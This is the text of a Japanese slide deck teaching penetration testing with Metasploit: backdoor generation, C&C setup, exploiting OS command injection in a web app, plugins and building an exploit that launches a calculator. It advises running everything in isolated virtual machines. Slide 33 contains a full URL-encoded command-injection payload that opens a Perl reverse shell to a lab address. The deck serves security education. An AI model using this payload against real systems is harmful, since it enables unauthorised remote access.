1. Metasploitでペネトレーションテスト
@super_a1ice

2. 目次
Metasploit Framework基本
Webアプリケーションの脆弱性を突いてみる
Metasploit プラグイン
Exploitを作って電卓を起動してみる

3. Metasploit Frameworkとは？
脆弱性を発見し、それを実証するためのフレームワー
ク
ペネトレーションテストを効率化するためのツール
システムに重大な被害を与える可能性があるため、使
用には注意が必要

4. Metasploit Framework基本

5. Msfconsoleコマンド

6. モジュールの指定

7. シェルコードを設定

8. オプションの確認

9. ファイル名を設定

10. IPアドレスを設定

11. ポート番号を設定

12. Exploitの作成

13. C&Cサーバの用意

14. オプションの確認

15. シェルコードの設定

16. オプションの確認

17. IPアドレスを設定

18. ポート番号を設定

19. C&Cサーバの作成

20. Let's exploit !

21. Readme.txt

22. 攻撃が成功すると

23. システム情報の取得

24. lsコマンド

25. Webアプリケーションの脆弱性を
突いてみる

26. 準備
OSコマンドインジェクションの脆弱性があるWebアプリ
ケーションを用意

27. 準備
OSコマンドインジェクションの脆弱性があるWebアプリ
ケーションを用意
後ろに任意のコマンドを挿入可能

28. ※実験の際の注意
必ず仮想環境を用いること
閉じたネットワーク内で実行する
スナップショットを用いて被害前の状態へ戻せるように
する

29. ペイロードを選択

30. IPアドレスの設定

31. バックドアの生成

32. C＆Cサーバの用意

33. Let's exploit !!
http://192.168.56.3/?ip=1.1.1.1;perl%20-MIO%20-
e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socke
t::INET%28PeerAddr,%22192.168.56.2:4444%22%29;STDI
N-%3Efdopen%28$c,r%29;$~-
%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27

34. 攻撃が成功すると

35. Metasploit プラグイン

36. プラグインを使用して機能を追加する

37. 便利なプラグイン
Openvas
MetasploitからOpenVASを利用するためのプラグイン
Nessus
MetasploitからNessusを利用するためのプラグイン
Xssf
MetasploitでXSSを行うためのプラグイン
http://xssf.googlecode.com/svn/trunk
auto_exploit
データベースに登録された脆弱性に対してexploitする
https://github.com/darkoperator/Metasploit-Plugins
Postauto
確立しているセッションにコマンドを送信する
https://github.com/darkoperator/Metasploit-Plugins

38. Exploitを作って電卓を
起動してみる

39. まずはExploitの用意
Exploit-dbから探す
http://www.exploit-db.com/
自作する

40. 今回は自作プログラムを用意

41. 大きなテキストファイルを読み込まると

42. ROP自動化

43. シェルコード選択

44. 変数の確認

45. 実行したいコマンドの設定

46. pythonのコードを生成

47. シェルコードをコピペしてから
Let's exploit !!!

48. 電卓が起動！！

49. ありがとうございました